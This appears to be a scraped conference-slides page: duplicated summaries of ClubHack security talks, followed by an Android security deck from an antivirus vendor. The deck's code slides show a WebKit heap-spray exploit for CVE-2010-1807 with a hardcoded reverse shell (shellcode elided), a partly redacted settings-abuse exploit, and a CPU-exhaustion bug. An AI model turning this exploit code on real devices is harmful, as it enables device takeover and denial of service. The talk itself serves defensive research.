The document discusses potential security issues with connected home devices and proposes a scenario called "Crazy Toaster" where a toaster or other networked appliance could be hacked to join a local network and become a security threat. It outlines steps to create a "Crazy Toaster Trojan" using UPnP and describes demonstrations of the SSDP denial of service vulnerability on Windows XP networks. The document concludes by discussing future hacking ideas and risks of interconnected devices and embedded systems.
The document discusses security issues with smart TVs. It notes that while smart TVs offer convenient features through internet connectivity, they also pose privacy and security risks. The document outlines several problems, including that smart TVs are often insecure due to bad coding practices, rely on security through obscurity, can be vulnerable on the server-side and through installed apps, and may not receive frequent and thorough security updates from vendors. Obtaining access to a smart TV could allow an attacker to spy on homeowners or access company meeting rooms.
Big data and cloud computing are increasing data risks as more data is concentrated in large amounts in single locations. Strict data privacy laws in countries like India and the US regulate data breaches. Many large companies have experienced major data breaches compromising millions of customer records. Common causes of breaches include lost or stolen devices, malware, and phishing. The costs of data breaches for businesses are significant and include costs for notification, monitoring, response, lawsuits, and lost customer trust. Cyber insurance can help cover third party liability and first party costs associated with data breaches, but has limitations compared to other insurance policies. Prudent Insurance Brokers is an expert that can help businesses assess cybersecurity risks, design customized cyber insurance plans
Summarising Snowden and Snowden as internal threatClubHack
A quick lookback at snowden's revelation and also lookign at snowden as an insider threat
*This presentation end abruptly because during the talk it ends as food for thought and kickstart of next session*
Fatcat Automatic Web SQL Injector by Sandeep KambleClubHack
What is FatCat Sql injector: This is an automatic SQL Injection tool called as FatCat.
Fatcat Purpose? : For testing your web application and exploit your application into more deeper.
FatCat Support:
1)Mysql 5.0
FatCat Features?
Union Based Sql Injection
Error Based Sql Injection
MOD Security Bypass (WAF)
The Difference Between the Reality and Feeling of Security by Thomas KurianClubHack
The paper shall focus on the following:
The paper shall focus on the following:
1) Introduction to the problem: Focus on “security awareness”, not “behavior”
2) Real life case study of why a US$100, 000 “security awareness” project failed
a. Identifying the human component in information security risks
b. Addressing the human component using “awareness” and “behavior”
strategies
4) Sample real-life case studies where quantifiable change has been observed
Original research and Publications
The talk is modeled on the methodology HIMIS (Human Impact Management for Information
Security) authored by Anup Narayanan and published under “Creative Commons,
The document discusses potential security issues with connected home devices and proposes a scenario called "Crazy Toaster" where a toaster or other networked appliance could be hacked to join a local network and become a security threat. It outlines steps to create a "Crazy Toaster Trojan" using UPnP and describes demonstrations of the SSDP denial of service vulnerability on Windows XP networks. The document concludes by discussing future hacking ideas and risks of interconnected devices and embedded systems.
The document discusses security issues with smart TVs. It notes that while smart TVs offer convenient features through internet connectivity, they also pose privacy and security risks. The document outlines several problems, including that smart TVs are often insecure due to bad coding practices, rely on security through obscurity, can be vulnerable on the server-side and through installed apps, and may not receive frequent and thorough security updates from vendors. Obtaining access to a smart TV could allow an attacker to spy on homeowners or access company meeting rooms.
Big data and cloud computing are increasing data risks as more data is concentrated in large amounts in single locations. Strict data privacy laws in countries like India and the US regulate data breaches. Many large companies have experienced major data breaches compromising millions of customer records. Common causes of breaches include lost or stolen devices, malware, and phishing. The costs of data breaches for businesses are significant and include costs for notification, monitoring, response, lawsuits, and lost customer trust. Cyber insurance can help cover third party liability and first party costs associated with data breaches, but has limitations compared to other insurance policies. Prudent Insurance Brokers is an expert that can help businesses assess cybersecurity risks, design customized cyber insurance plans
Summarising Snowden and Snowden as internal threatClubHack
A quick lookback at snowden's revelation and also lookign at snowden as an insider threat
*This presentation end abruptly because during the talk it ends as food for thought and kickstart of next session*
Fatcat Automatic Web SQL Injector by Sandeep KambleClubHack
What is FatCat Sql injector: This is an automatic SQL Injection tool called as FatCat.
Fatcat Purpose? : For testing your web application and exploit your application into more deeper.
FatCat Support:
1)Mysql 5.0
FatCat Features?
Union Based Sql Injection
Error Based Sql Injection
MOD Security Bypass (WAF)
The Difference Between the Reality and Feeling of Security by Thomas KurianClubHack
The paper shall focus on the following:
The paper shall focus on the following:
1) Introduction to the problem: Focus on “security awareness”, not “behavior”
2) Real life case study of why a US$100, 000 “security awareness” project failed
a. Identifying the human component in information security risks
b. Addressing the human component using “awareness” and “behavior”
strategies
4) Sample real-life case studies where quantifiable change has been observed
Original research and Publications
The talk is modeled on the methodology HIMIS (Human Impact Management for Information
Security) authored by Anup Narayanan and published under “Creative Commons,
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...ClubHack
NFC or the Near Field Communication allows cell phones to perform specified actions whenever they detect NFC tags or signals from other NFC enabled device. Most of the recent phones including Samsung Galaxy S3, Nokia Lumia 610, Blackberry Bold etc have NFC enabled with them. NFC even helps enterprise/payment gateways to ease up users actions, such as connecting to a wifi, setting a bookmark, making payments etc.
Gone are the days of sending Android malware links through URL or attachments. In this talk, we will be showing how an attacker could steal the private and sensitive information from one’s phone and even perform malicious actions on user’s phone, using NFC as an attack vector. NFC attack vectors come in two forms : Active(setting attacker’s phone as a proxy between victim’s smartphone and the payment terminal) and Passive(using NFC tags).For our demonstrations, we would be creating malicious NFC tags which when detected by any smartphone(NFC enabled) would steal sensitive informations from the phones (without the users knowledge) as well as trick user to install malicious applications to his phone. Thereafter, we would also be talking about how an attacker could get in close proximity of another NFC-enabled phone, get a remote shell on the victim’s phone and compromise the phone’s security. We would also be discussing how viral an NFC attack could go in future, if proper security measures are not enforced.
Smart grids is an added communication capabilities and intelligence to traditional grids,smart grids are enabled by Intelligent sensors and actuators, Extended data management system,Expanded two way communication between utility operation system facilities and customers,Network security ,National integration ,Self healing and adaptive –Improve distribution and transmission system operation,Allow customers freedom to purchase power based on dynamic pricing ,Improved quality of power-less wastage ,Integration of large variety of generation options.
We have seen the more complex and critical infrastructure the more vulnerable they are. From the Year of 1994 we have seen lots of incidents where SmartGrid were Hacked the latest and booming incident was Stuxnet Worm which targeted Nuclear Power System of Iran and Worldwide.There are different types of Attacks we will see. Security needed for Smart Grid.
Legal Nuances to the Cloud by Ritambhara AgrawalClubHack
This presentation highlights the key legal risks and their implications in cloud computing. Cloud is inherently multi-jurisdictional, encompassing, remote hosting and processing of the data. This gives rise to multiple legal issues including security and privacy of the data, IP Rights, data portability, contractual limitations, risk mitigation and jurisdictional disputes.
As the cloud involves remote hosting and data accessibility by multiple parties, security and privacy remains the biggest concern for the companies. Businesses should look at issues ranging from physical location of the data centers, protection of the data against any adversity and intrusion, and access rights management.
The cloud servers are often located in different countries, which results in trans- border Data Flow. Each country has its own set of legal rules and regulations regarding data protection and privacy policies and the same can bring in complications in form of conflicting laws and jurisdictional disputes. Issues pertaining to IP rights, trade secrets and ownership of the data placed in the cloud require utmost attention. Termination and exit clauses are critical to the contract in the clouds. Interoperability of the data in the event of termination of services of a vendor is an important aspect to be considered in the contracts.
Infrastructure Security by Sivamurthy HiremathClubHack
With the development of technology, the interdependence of various infrastructures has increased, which also enhanced their vulnerabilities. The National Information Infrastructure security concerns the nation’s stability and economic security. So far, the research in Internet security primarily focused on securing the information rather than securing the infrastructure itself.
The pervasive and ubiquitous nature of the Internet coupled with growing concerns about cyber attacks we need immediate solutions for securing the Internet infrastructure. Given the prevailing threat situation, there is a compelling need to develop Hardware redesign architectures, Algorithms, and Protocols to realize a dependable Internet infrastructure. In order to achieve this goal, the first and foremost step is to develop a comprehensive understanding of the security threats and existing solutions. These attempts to fulfil this important step by providing classification of Security attacks are classified into four main categories: DNS hacking, Routing table poisoning, Packet mistreatment, and Denial-of-Service attacks. We are generally discussing on the existing Infrastructure solutions for each of these categories, and also outline a methodology for developing secured Nation.
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
Today there is a flood of tools to help with the automation of active scanning and exploitation of web applications. Once you move beyond these two functions the flood reduces down to a trickle. Vulnerability hunting is a fine art that requires a knack for seeing hidden patterns and connections. Tests like hidden parameters guessing are seldom performed by even skilled testers because of the time and effort involved in preparing for and performing them. When was the last time you identified a piece of sensitive data hidden in plain sight because it was hex encoded in to a very inconsequential looking string?
Do you enumerate all possible avenues for stored XSS in an application? A lot of times checks are missed because there is no good tooling available to perform them effectively and efficiently. HAWAS is the tool you have been missing for a long time now. It is an open source tool that is designed for hybrid analysis. It performs automated passive analysis of a web application with no input from the user for some cases and with specific application specific input for some other cases. Based on the initial set of findings the user can perform further checks from within HAWAS. HAWAS will help you hugely increase your test coverage with very little additional effort.
Hacking and Securing iOS Applications by Satish BomissttyClubHack
iOS applications share common set of classes and highly depends on the operating system solutions for data communication, storage and encryption. Solely depending on the Apple implementation made them less complex but it affects security of the applications. Though iOS comes with a great set of security features like code signing, ASLR, DEP, sand boxing and Data Protection, all of them are subject to attack. Relying only on the iOS security could lead to demise the sensitive data stored within the application when the iOS is compromised. Application security can be improved by understanding the weaknesses in the current implementation and incorporating own code that work better.
The presentation illustrates several types of iOS application attacks like run time manipulation, custom code injection, SSL session hijacking and forensic data leakage. It gives an insight into the iOS Keychain & data protection API and explains the techniques to circumvent it. The presentation will provide guidelines and suggests best practices for secure iOS application development.
Critical Infrastructure Security by Subodh BelgiClubHack
Industrial Automation & Control Systems are an integral part of various manufacturing & process industries as well as national critical infrastructure. Concerns regarding cyber-security of control systems are related to both the legacy nature of some of the systems as well as the growing trend to connect industrial control systems to corporate networks. These concerns have led to a number of identified vulnerabilities and have introduced new categories of threats that have not been seen before in the industrial control systems domain. Many of the legacy systems may not have appropriate security capabilities that can defend against modern day threats, and the requirements for availability and performance can preclude using contemporary cyber-security solutions. To address cyber-security issues for industrial control systems, a clear understanding of the security challenges and specific defensive countermeasures is required. The session will highlight some of the latest cyber security risks faced by industrial automation and control systems along with essential security controls & countermeasures.
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaClubHack
The document discusses Content-Type attacks and how to protect against them. The author works as an information security consultant focusing on vulnerability assessment, penetration testing, and secure environment setup. Content-Type attacks involve exploiting vulnerabilities in client-side software like Adobe Reader or Microsoft Office to execute malicious code. Attackers embed malformed content that corrupts memory, allowing their shellcode to run. The document then covers the attack process, malicious document structure, a demo, PDF file format overview, analyzing PDFs with scripts, and protection techniques like keeping software updated, disabling scripts, enabling data execution prevention, and avoiding opening unknown file attachments.
This document discusses cross-site scripting (XSS) and introduces XSSShell, a tool that uses XSS vulnerabilities to execute commands on a victim's browser. It begins with an introduction to XSS and its risks, then outlines XSS types and demonstrates XSSShell by exploiting vulnerabilities in a demo application. The document aims to show how XSSShell works by establishing a server and injecting client-side JavaScript to create an administrative interface that can control infected browsers.
It gives me immense pleasure to tell you that from 06-02-10 to 06-02-12 our magazine has completed two successful and rejoicing years. We at ClubHack are super excited! I hope you people are enjoying the magazine and would continue doing so it in the coming future too. We enjoy making this for you all.It is said that “A lot can happen over a cup of coffee”. We experienced this amazing moment over a cup of coffee when we had the idea of starting a hacking magazine and it now it has come all this way… :). 2 years looks small when we look back.For this incredible success we at ClubHack would like to thank all our readers, volunteers and authors for giving us such unbelievable support. As we want to keep up the growth and progress therefore we request you all to keep throwing in articles, suggestions, support and your love!
Coming to this issue we have Network Security in Tool Gyan which will put light on how to set up a secured network, Who wants to be a Millionaire in Tool Gyan, check out yourself of what exactly its all about ;)TOR in Mom's guide for all those who thought 'It sounds very complicated to use, I’m not a hacker! I can’t use it!' by our Author- Federico from Italy.
From this month’s issue we plan to start a new section on secure coding. This section will essentially focus on good coding practices and snippets to mitigate various vulnerabilities. To begin with we have an article on PHP based RFI/LFI vulnerability. I hope you will like reading it. We also have some cool articles on XSS attacks, ROT decoding and Matriux section.
Do send us your feedback on abhijeet@chmag.in this will help us improve further.
This document discusses steganography, which is a method of hiding secret messages within other files or data streams. It provides definitions and examples of different types of steganography, including static steganography which hides messages in digital files, and dynamic steganography which hides messages in protocols like TCP/IP packets as they are transmitted over the internet. The document also discusses uses of steganography, such as watermarking to track copyrighted content, and concerns about potential terrorist use of steganography over the internet through covert channels. Detection of hidden messages, called steganalysis, and technology to help law enforcement monitor covert communications are also mentioned.
There was a time when mobile phones were of the size of a shoe and had no features other than calling and sms and at that time I used to play the game - Snake on my dads phone :p Now as the time has passed we have reached the age of smart phones which are capable of doing lot of stuff and world wide web of application causing serious concern where an attacker can use this platform to steal data. This issue of CHMag is dedicated Mobile/Telecom Hacking and Security.
The coverpage of this December issue was released at ClubHack 2011, India’s Pioneer International Hacking Conference held last week. Talking about ClubHack Conference, if you missed ClubHack here are the presentations available at - http://www.slideshare.net/clubhack and videos at http://www.clubhack.tv/event/2011/
We recently released CHMag's Collector's Edition Volume II. If you wish to buy the Collectors Editions (vol1 – from issue 1 to 10 & vol2- from issue 11 to 20), please write back to us: info@chmag.in. As of now its on demand printing.
Like the game - Snake, I have played lots of other games too which have reflected in the previous coverpages I have designed and yes I promise another awesome coverpage based on a game on the theme of android security which would be the theme for an upcoming issue, for which send in your articles to info@chmag.in
One Link provides direct access to a Facebook account without needing a username or password by bypassing all security points through a single link. The link contains parameters like a photo or user ID and a secret key that can be brute forced or socially engineered to gain full access to random Facebook accounts. Users should be aware of these direct links and the security risks they pose.
The document discusses using a Teensy microcontroller device to compromise secure environments. It begins by providing background on the presenter and an overview of topics to be covered. It then discusses limitations in typical pentests and how exploiting vulnerabilities is important. The document proposes using a Teensy device to bypass security controls and perform tasks like enabling RDP, downloading files, and keylogging. It demonstrates some payloads, notes current limitations, and ideas for future improvements like using additional storage. The conclusion is that Teensy can be used as a complete pentesting device if leveraged properly.
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...ClubHack
NFC or the Near Field Communication allows cell phones to perform specified actions whenever they detect NFC tags or signals from other NFC enabled device. Most of the recent phones including Samsung Galaxy S3, Nokia Lumia 610, Blackberry Bold etc have NFC enabled with them. NFC even helps enterprise/payment gateways to ease up users actions, such as connecting to a wifi, setting a bookmark, making payments etc.
Gone are the days of sending Android malware links through URL or attachments. In this talk, we will be showing how an attacker could steal the private and sensitive information from one’s phone and even perform malicious actions on user’s phone, using NFC as an attack vector. NFC attack vectors come in two forms : Active(setting attacker’s phone as a proxy between victim’s smartphone and the payment terminal) and Passive(using NFC tags).For our demonstrations, we would be creating malicious NFC tags which when detected by any smartphone(NFC enabled) would steal sensitive informations from the phones (without the users knowledge) as well as trick user to install malicious applications to his phone. Thereafter, we would also be talking about how an attacker could get in close proximity of another NFC-enabled phone, get a remote shell on the victim’s phone and compromise the phone’s security. We would also be discussing how viral an NFC attack could go in future, if proper security measures are not enforced.
Smart grids is an added communication capabilities and intelligence to traditional grids,smart grids are enabled by Intelligent sensors and actuators, Extended data management system,Expanded two way communication between utility operation system facilities and customers,Network security ,National integration ,Self healing and adaptive –Improve distribution and transmission system operation,Allow customers freedom to purchase power based on dynamic pricing ,Improved quality of power-less wastage ,Integration of large variety of generation options.
We have seen the more complex and critical infrastructure the more vulnerable they are. From the Year of 1994 we have seen lots of incidents where SmartGrid were Hacked the latest and booming incident was Stuxnet Worm which targeted Nuclear Power System of Iran and Worldwide.There are different types of Attacks we will see. Security needed for Smart Grid.
Legal Nuances to the Cloud by Ritambhara AgrawalClubHack
This presentation highlights the key legal risks and their implications in cloud computing. Cloud is inherently multi-jurisdictional, encompassing, remote hosting and processing of the data. This gives rise to multiple legal issues including security and privacy of the data, IP Rights, data portability, contractual limitations, risk mitigation and jurisdictional disputes.
As the cloud involves remote hosting and data accessibility by multiple parties, security and privacy remains the biggest concern for the companies. Businesses should look at issues ranging from physical location of the data centers, protection of the data against any adversity and intrusion, and access rights management.
The cloud servers are often located in different countries, which results in trans- border Data Flow. Each country has its own set of legal rules and regulations regarding data protection and privacy policies and the same can bring in complications in form of conflicting laws and jurisdictional disputes. Issues pertaining to IP rights, trade secrets and ownership of the data placed in the cloud require utmost attention. Termination and exit clauses are critical to the contract in the clouds. Interoperability of the data in the event of termination of services of a vendor is an important aspect to be considered in the contracts.
Infrastructure Security by Sivamurthy HiremathClubHack
With the development of technology, the interdependence of various infrastructures has increased, which also enhanced their vulnerabilities. The National Information Infrastructure security concerns the nation’s stability and economic security. So far, the research in Internet security primarily focused on securing the information rather than securing the infrastructure itself.
The pervasive and ubiquitous nature of the Internet coupled with growing concerns about cyber attacks we need immediate solutions for securing the Internet infrastructure. Given the prevailing threat situation, there is a compelling need to develop Hardware redesign architectures, Algorithms, and Protocols to realize a dependable Internet infrastructure. In order to achieve this goal, the first and foremost step is to develop a comprehensive understanding of the security threats and existing solutions. These attempts to fulfil this important step by providing classification of Security attacks are classified into four main categories: DNS hacking, Routing table poisoning, Packet mistreatment, and Denial-of-Service attacks. We are generally discussing on the existing Infrastructure solutions for each of these categories, and also outline a methodology for developing secured Nation.
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
Today there is a flood of tools to help with the automation of active scanning and exploitation of web applications. Once you move beyond these two functions the flood reduces down to a trickle. Vulnerability hunting is a fine art that requires a knack for seeing hidden patterns and connections. Tests like hidden parameters guessing are seldom performed by even skilled testers because of the time and effort involved in preparing for and performing them. When was the last time you identified a piece of sensitive data hidden in plain sight because it was hex encoded in to a very inconsequential looking string?
Do you enumerate all possible avenues for stored XSS in an application? A lot of times checks are missed because there is no good tooling available to perform them effectively and efficiently. HAWAS is the tool you have been missing for a long time now. It is an open source tool that is designed for hybrid analysis. It performs automated passive analysis of a web application with no input from the user for some cases and with specific application specific input for some other cases. Based on the initial set of findings the user can perform further checks from within HAWAS. HAWAS will help you hugely increase your test coverage with very little additional effort.
Hacking and Securing iOS Applications by Satish BomissttyClubHack
iOS applications share common set of classes and highly depends on the operating system solutions for data communication, storage and encryption. Solely depending on the Apple implementation made them less complex but it affects security of the applications. Though iOS comes with a great set of security features like code signing, ASLR, DEP, sand boxing and Data Protection, all of them are subject to attack. Relying only on the iOS security could lead to demise the sensitive data stored within the application when the iOS is compromised. Application security can be improved by understanding the weaknesses in the current implementation and incorporating own code that work better.
The presentation illustrates several types of iOS application attacks like run time manipulation, custom code injection, SSL session hijacking and forensic data leakage. It gives an insight into the iOS Keychain & data protection API and explains the techniques to circumvent it. The presentation will provide guidelines and suggests best practices for secure iOS application development.
Critical Infrastructure Security by Subodh BelgiClubHack
Industrial Automation & Control Systems are an integral part of various manufacturing & process industries as well as national critical infrastructure. Concerns regarding cyber-security of control systems are related to both the legacy nature of some of the systems as well as the growing trend to connect industrial control systems to corporate networks. These concerns have led to a number of identified vulnerabilities and have introduced new categories of threats that have not been seen before in the industrial control systems domain. Many of the legacy systems may not have appropriate security capabilities that can defend against modern day threats, and the requirements for availability and performance can preclude using contemporary cyber-security solutions. To address cyber-security issues for industrial control systems, a clear understanding of the security challenges and specific defensive countermeasures is required. The session will highlight some of the latest cyber security risks faced by industrial automation and control systems along with essential security controls & countermeasures.
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaClubHack
The document discusses Content-Type attacks and how to protect against them. The author works as an information security consultant focusing on vulnerability assessment, penetration testing, and secure environment setup. Content-Type attacks involve exploiting vulnerabilities in client-side software like Adobe Reader or Microsoft Office to execute malicious code. Attackers embed malformed content that corrupts memory, allowing their shellcode to run. The document then covers the attack process, malicious document structure, a demo, PDF file format overview, analyzing PDFs with scripts, and protection techniques like keeping software updated, disabling scripts, enabling data execution prevention, and avoiding opening unknown file attachments.
This document discusses cross-site scripting (XSS) and introduces XSSShell, a tool that uses XSS vulnerabilities to execute commands on a victim's browser. It begins with an introduction to XSS and its risks, then outlines XSS types and demonstrates XSSShell by exploiting vulnerabilities in a demo application. The document aims to show how XSSShell works by establishing a server and injecting client-side JavaScript to create an administrative interface that can control infected browsers.
It gives me immense pleasure to tell you that from 06-02-10 to 06-02-12 our magazine has completed two successful and rejoicing years. We at ClubHack are super excited! I hope you people are enjoying the magazine and would continue doing so it in the coming future too. We enjoy making this for you all.It is said that “A lot can happen over a cup of coffee”. We experienced this amazing moment over a cup of coffee when we had the idea of starting a hacking magazine and it now it has come all this way… :). 2 years looks small when we look back.For this incredible success we at ClubHack would like to thank all our readers, volunteers and authors for giving us such unbelievable support. As we want to keep up the growth and progress therefore we request you all to keep throwing in articles, suggestions, support and your love!
Coming to this issue we have Network Security in Tool Gyan which will put light on how to set up a secured network, Who wants to be a Millionaire in Tool Gyan, check out yourself of what exactly its all about ;)TOR in Mom's guide for all those who thought 'It sounds very complicated to use, I’m not a hacker! I can’t use it!' by our Author- Federico from Italy.
From this month’s issue we plan to start a new section on secure coding. This section will essentially focus on good coding practices and snippets to mitigate various vulnerabilities. To begin with we have an article on PHP based RFI/LFI vulnerability. I hope you will like reading it. We also have some cool articles on XSS attacks, ROT decoding and Matriux section.
Do send us your feedback on abhijeet@chmag.in this will help us improve further.
This document discusses steganography, which is a method of hiding secret messages within other files or data streams. It provides definitions and examples of different types of steganography, including static steganography which hides messages in digital files, and dynamic steganography which hides messages in protocols like TCP/IP packets as they are transmitted over the internet. The document also discusses uses of steganography, such as watermarking to track copyrighted content, and concerns about potential terrorist use of steganography over the internet through covert channels. Detection of hidden messages, called steganalysis, and technology to help law enforcement monitor covert communications are also mentioned.
There was a time when mobile phones were of the size of a shoe and had no features other than calling and sms and at that time I used to play the game - Snake on my dads phone :p Now as the time has passed we have reached the age of smart phones which are capable of doing lot of stuff and world wide web of application causing serious concern where an attacker can use this platform to steal data. This issue of CHMag is dedicated Mobile/Telecom Hacking and Security.
The coverpage of this December issue was released at ClubHack 2011, India’s Pioneer International Hacking Conference held last week. Talking about ClubHack Conference, if you missed ClubHack here are the presentations available at - http://www.slideshare.net/clubhack and videos at http://www.clubhack.tv/event/2011/
We recently released CHMag's Collector's Edition Volume II. If you wish to buy the Collectors Editions (vol1 – from issue 1 to 10 & vol2- from issue 11 to 20), please write back to us: info@chmag.in. As of now its on demand printing.
Like the game - Snake, I have played lots of other games too which have reflected in the previous coverpages I have designed and yes I promise another awesome coverpage based on a game on the theme of android security which would be the theme for an upcoming issue, for which send in your articles to info@chmag.in
One Link provides direct access to a Facebook account without needing a username or password by bypassing all security points through a single link. The link contains parameters like a photo or user ID and a secret key that can be brute forced or socially engineered to gain full access to random Facebook accounts. Users should be aware of these direct links and the security risks they pose.
The document discusses using a Teensy microcontroller device to compromise secure environments. It begins by providing background on the presenter and an overview of topics to be covered. It then discusses limitations in typical pentests and how exploiting vulnerabilities is important. The document proposes using a Teensy device to bypass security controls and perform tasks like enabling RDP, downloading files, and keylogging. It demonstrates some payloads, notes current limitations, and ideas for future improvements like using additional storage. The conclusion is that Teensy can be used as a complete pentesting device if leveraged properly.
4. Agenda The problem Apps stores revolution Security research Android exploits + demos Android security Basics Me Me Me ... The world of tomorrow ToDo: mobile safe best practice
5. Me Me Me ... White hat hacker Former senior security researcher at finjan Former security architect at checkpoint Speaker in security conventions around the world EX-Windows boy, Javascript Ninja CTO & Co-founder at droidSecurity Made the first web based worm POC in 2003
6. About droidSecurity Makers of android ‘antivirus free’ & ‘antivirus pro’ First antivirus product in the android market, since march 2009, based on linux Innovative solution based on XML-RPC and cloud computing Ranked top 39th popular program in android market Ranked as number 3-5 in communication category Leaders of the android security market, with a strong security research team Installed on 5M devices >500,000 new users a month
7. The Problem Mobile phones became the most personal and private item we own possible replacement for windows Mobile devices are especially vulnerable to physical loss and theft A growing number of users, run real operating systems run on smartphones, probably will continue to grow in coming years Open source allows attackers to find exploits Always on, always connected mobile mini-computers, strong Hardware, with tons of users content the ‘usual” suspects : spam, spyware, phising , hacking tools, bad people, jailbreak devices, windows viruses *Smartphones survey:Type,jailbreak?
8. The Problem (Techie) Linuxs bugs --> problems in linux or 3 party libs File bugs --> file format vulnerabilities Users bug --> bugs in users SMS (text messages) as attack vector is 'wormable' There is no 3-party app content filtering in android market [Come one. Come all.] Privacy issues with GPS, camera and mic, cell tower info Smartphones can be pwned: compermise network security, attach pc's, sniff info 3 party apps have full access to phone features: in & outbound call interception, send/read SMS,GPS attackers can :steal money, identity ,sabotage networks, attack cell phones and computers, searching mails and pics,tap activities, calls, locate via cell tower & wireless networks
9. Mobile = Devices And More… Smart phones Google-TV Tablets External memory Chrome OS E-readers Devices - not just phones, but TVs, blu-ray players, netbooks, ereaders, MIDs
10.
11. Apps stores revolution People pay for content Open garden Vs closed garden Everyone has app store: Google,Apple,Nokia,Amazon Long tail - more then 100k apps in the market Android market- mobile software distribution platform ,with billing, updates and statistics No enforcement or testing policy aka iTunes/Apple 1984 regime Worm often masked as useful application or sexy stuff Different mobile content types to protect: applications (games, tools, etc),screen savers & wallpapers, ring tones,media (music, video, photos)
12.
13.
14. Android Exploits + demos Trojan-SMS.AndroidOS.FakePlayer virus Webkit HeapSpray Android 2.0-2.1 LauncherSpam, fake virus apps & fake icons Android Settings.Secure is Dead [Fixed,not deployed] Sorry, no demo for you! Android killer app, CPU Killer Bug
15. Trojan-SMS.AndroidOS.FakePlayer found on the wild It displays a message in Russian and then sends SMS messages without the user's consent. In Linux that would not have happened. Oh,it's Linux TrojanSMS.AndroidOS.FakePlayer The SMS it sends contains the string "798657" to Russian premium SMS short code numbers 3353,3354,sent $6 SMS messages Primitive ,POC level, with local distribution, limited damage Have another 2 porn related variants and use black SEO method Demo
16. LauncherSpam Install fake virus apps & icons on the victim device Publish on android market POC level Demo
17. try { ContentValues cV = new ContentValues() ; //Uri secure = Uri.parse("content://settings/secure") ; Uri secure = Uri.parse("content://settings/" + " ##..## ") ; ContentValues cv = new ContentValues() ; cv.put("name", "location_providers_allowed") ; cv.put("value", "gps") ; getContentResolver().insert(secure, cv) ; WifiManager mWifim = (WifiManager)getSystemService("wifi") ; boolean wifistate = mWifim.isWifiEnabled() ; mWifim.setWifiEnabled(!wifistate) ; mWifim.setWifiEnabled(wifistate) ; } catch (Exception e) {} try { ContentValues cv1 = new ContentValues() ; Uri secure = Uri.parse("content://settings/" + " ##..## ") ; cv1.put("name", "install_non_market_apps") ; cv1.put("value", "1") ; getContentResolver().insert(secure, cv1) ; } catch (Exception e) {} finish() ; // ##..## is a replacement for actual exploit code which remain private until fix is out Anroid Settings.Secure is dead
18. WebKit Heap Spray <html> <head> <script> // bug = webkit code execution CVE-2010-1807 //http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807 // listed as a safari bug but also works on android :) //tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1 //patched= android 2.2 hardcoded reverse shell to 10.0.2.2 port 2222 function sploit(pop){ var span = document.createElement("div"); document.getElementById("pwn").appendChild(span); span.innerHTML = pop; } function heap(){ var scode = unescape ("3c8400573c80....More...Shell...Code...Here...687320002000200020002000200020002000200020000002ae08000a020220002000") do { scode += scode; } while(scode.length < 0x1000); target = new Array(); for(i = 0; i < 1000; i++) target[i] = scode; for (i = 0; i <= 1000; i++) { if (i>999) { sploit(-parseFloat("NAN(ffffe00572c60)")); } document.write("The targets!! " + target[i]); document.write("<br />"); }}</script> </head> <body id="pwn">woot<script> heap();</script> </body> </html> Demo
19. CPU Killer Bug AlarmManager am = (AlarmManager)getSystemService(ALARM_SERVICE) ; Intent op = new Intent(); op.setAction("cpuKillerReciver") ; PendingIntent operation = PendingIntent.getBroadcast(this, 1, op, PendingIntent.FLAG_UPDATE_CURRENT); am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis() -2,1, operation); BroadcastReceiver br = new BroadcastReceiver() { @Override public void onReceive(Context context, Intent intent){} }; IntentFilter iFilter = new IntentFilter("cpuKillerReciver") ; registerReceiver(br, iFilter) ; Demo
20. Security Research Lots of research opportunities ,Platform well understood by hackers Mobile client-side web hacking spread Feds & Govs are playing Browser is native code (webkit) Some security classics are re-introduce ARM shell codes for android Decompile .dex back to .class or to source
21. The world of tomorrow Welcome to the new era of mobile phishing SMS spamming becomes aggressive "You have zero privacy anyway" - Scott McNealy, Sun (1999) Hijack devices in restricted area (GPS bomb) Back to the era of mobile phone dialers Trojan targeting fraud (espionage already in place) Botnet attack in the android Market
22. Downloading apps from untrusted or pirated sources Allowing strangers to borrow their phones Using 3rd party open source libraries, apps and components that may harbor bugs and malicious code Installing apps that do not come with positive user feedback or ratings Clicking on suspicious text messages, which ask for personal info, passwords or ask to take urgent actions Conducting online banking activities via unofficial apps Letting others, including family members ( kids in particular ) play with their phones or install apps High Risk Practices Mobile Users Should Avoid ToDo: mobile safe best practice *Change iPhone's "alpine" root pass
23. Conclusions Are we entering the State of Mobile Sabotage age? Oh yeah, Mobile Devices are as bad as their software authors Mobile world is a brand new game with new rules Cheap hardware appliances open a door for “bad guys” SMS (text messages) as attack vector is 'wormable' mobile devices goes to Starbucks with the user to drink coffee and could be left behind